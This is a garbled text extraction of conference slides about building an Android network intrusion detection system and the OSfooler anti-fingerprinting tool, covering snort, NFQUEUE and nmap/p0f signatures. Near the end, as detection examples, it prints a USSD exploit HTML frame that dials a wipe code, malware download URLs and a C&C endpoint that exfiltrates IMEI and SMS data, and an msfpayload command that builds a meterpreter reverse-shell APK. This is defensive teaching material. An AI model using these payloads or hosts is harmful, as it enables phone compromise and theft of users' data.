  • 13. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED VPN eth0:WiFi rmnet0: 3G snort tcpdump Internet gateway !"In"order"to"analyze"the"traffic"flows"we’ll"create"a"VPN"tunnel"between"our" Android"device"and"our"computer. !" The" VPN" tunnel" uses" digital" cerGficates" (public/private" key" pair)" to" authenGcate"the"client"and"the"server. !"Using"digital"cerGficates"instead"of"a"shared"key"gives"higher"flexibility,"for" instance"we"can"revoke"access"in"case"if"the"smartphone"is"lost. JAIME SÁNCHEZ (@SEGOFENSIVA) 13 DEFCON 21 DEEPSEC
  • 14. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !"Once"the"VPN"tunnel"is"established" and" the" traffic" is" being" sent" to" the" VPS," we" can" start" monitoring" the" traffic"with"snort. !" We" will" take" advantage" of" two" main"signatures:" official" rules" (the" registered" version" rules)" and" the" Emerging" Threats" (Emerging" Threats). !" We" can" also" use" tools" like" tcpdump" to" capture" traffic" for" later" analysis. !"Wireshark"gives"a"much"beLer"view"of"the"content"and"the"qualiGes" of"each"IP"datagram"or"the"TCP"segments JAIME SÁNCHEZ (@SEGOFENSIVA) 14 DEFCON 21 DEEPSEC
  • 17. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" OSfooler" is" a" pracGcal" approach" presented" at" Black" Hat" Arsenal" USA" 2013. !" It" can" be" used" to" detect" and" defeat" acGve" and" passive" remote" OS" fingerprinGng"from"tools"like"nmap,"p0f"or"commercial"appliances. JAIME SÁNCHEZ (@SEGOFENSIVA) 17 DEFCON 21 DEEPSEC
  • 18. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED NMAP"INTERNAL"PROBES Fingerprint Linux 2.6.17 - 2.6.24 Class Linux | Linux | 2.6.X | general purpose SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U) OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C) WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018) ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=) T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=) T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(DFI=N%T=3B-45%TG=40%CD=S) Most"important: !"TCP"ISN"greatest"common"divisor"(GDC) !"TCP"IP"ID"sequence"generaGon"alg"(TI) !"TCP"Gmestamp"opGon"alg"(TS) !"TCP"OpGons"(O,"O1RO6) !"TCP"iniGal"Window"Size"(W,"W1RW6) !"Responsiveness"(R) !"IP"don’t"fragment"bit"(DF) !"IP"iniGal"GmeKtoKlive"guess"(TG) JAIME SÁNCHEZ (@SEGOFENSIVA) Although"there"are"others: !"TCP"ISN"counter"rate"(ISR) !"ICMP"IP"ID"sequence"generaGon"alg"(II) !"Shared"IP"ID"sequence"Boolean"(SS) !"Don’t"Fragment"ICMP"(DFI) !"Explicit"congesGon"noGficaGon"(C) !"TCP"miscellaneous"quirks"(Q) !"TCP"sequence"number"(S) !"etc. 18 NUIT DU HACK 2013 DEEPSEC
  • 19. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN P0F"SIGNATURES 8192:32:1:48:M*,N,N,S:.:Windows:98 Opera&ng)System ""K"Family ""K"Version Packet) Size Quirks """K"Data"in"SYN"packets """K"OpGons"arer"EOL """K"IP"ID"Field"="0 """K"ACK"different"to"0 """K"Unusual"flags """K"Incorrect"opGons"decode DF)Bit) Ini&al)TTL TCP)op&ons)and)order Window)Size """K"N:"NOP """K"E:"EOL """K"Wnnn:"WS """K"Mnnn:"MSS """K"S:"SACK """K"T"/"T0:"Timestamp"" """K"?n """K"*"Any"value """K"%nnn"nnn"MulGple """K"Sxx"MSS"MulGple """K"Txx"MTU"MulGple """K"xxx"Constant"value JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) 16 19 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  • 20. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
  • 22. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
  • 23. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
  • 24. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
  • 25. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 26. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  • 27. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 28. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 29. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
  • 30. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
  • 32. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 33. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 34. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 35. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 36. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 37. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 38. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 39. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 40. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED REMOTE"OS"FINGERPRINTING !"Detect"and"drop"packet"sent"from"wellKknown"scanning"tools. !"nmap"OS"fingerprinGng"works"by"sending"up"to"16"TCP,"UDP,"and"ICMP"probes" to"known"open"and"closed"ports"of"the"target"machine. SEQUENCE"GENERATION"(SEQ,"OPS,"WIN"&"T1) ICMP"ECHO"(IE) TCP"EXPLICIT"CONGESTION"NOTIFICATION"(ECN) TCP"T2RT7 UDP JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 41. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PATTERN"MATCHING I’M"WATCHING"YOU... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 42. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SIGNATURE"FORMAT !"With"the"help"of"custom"build"signatures,"the"framework"can"also"be" used"to"detect"probes"or"aLacks"designed"for"mobile"devices " !"Useful"signatures"from"Snort"and"Emerging"Threats !"Convert"snortKlike"rules"to"a"friendly"format: JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 44. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android"2.0"USERAFTERRFREE"REMOTE"CODE"EXECUTION !) Does)not)properly)validate) floa&ngpoint)data,) which)allows)remote) a]ackers) to)execute) arbitrary)code)or)cause)a)denial)of)service. !)Executed)via)craKed)HTML)document. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 45. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED USSD"EXPLOIT !"A" USSD" code" is"entered"into"phones" to"perform" acGons. !" They" are" mainly" used" by" network" operators" to" provide" customers" with" easy" access" to" preK configured"services,"including: !"callKforwarding !"balance"inquiries !"mulGple"SIM"funcGons. !"The"HTML"code"to"execute"such"an"acGon"is"as"follows: <a#href="tel:xyz">Click#here#to#call</a> !"Example"exploit: <frameset>#<frame#src="tel:*2767*3855#"#/>#</#frameset> JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 46. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MALWARE !"ANDR.TROJAN.SMSSEND !"Download"from: !"hxxp://adobeflashplayerEup.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184" !"hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"hxxp://browsernewEupdate.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"Once"executed,"connect"to"C&C:""gaga01.net/rq.php !oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX !"Search"paLern:"rq.php !"METERPRETER !""It"features"command"history,"tab"compleGon," channels,"and"more. !"Let’s"try: $#msfpayload#android/meterpreter/reverse_tcp#LHOST=192.168.0.20#R#>#meter.apk $#file#meter.apk# ###meter.apk:#Zip#archive#data,#at#least#v2.0#to#extract JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 47. T H A N K Y O U! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM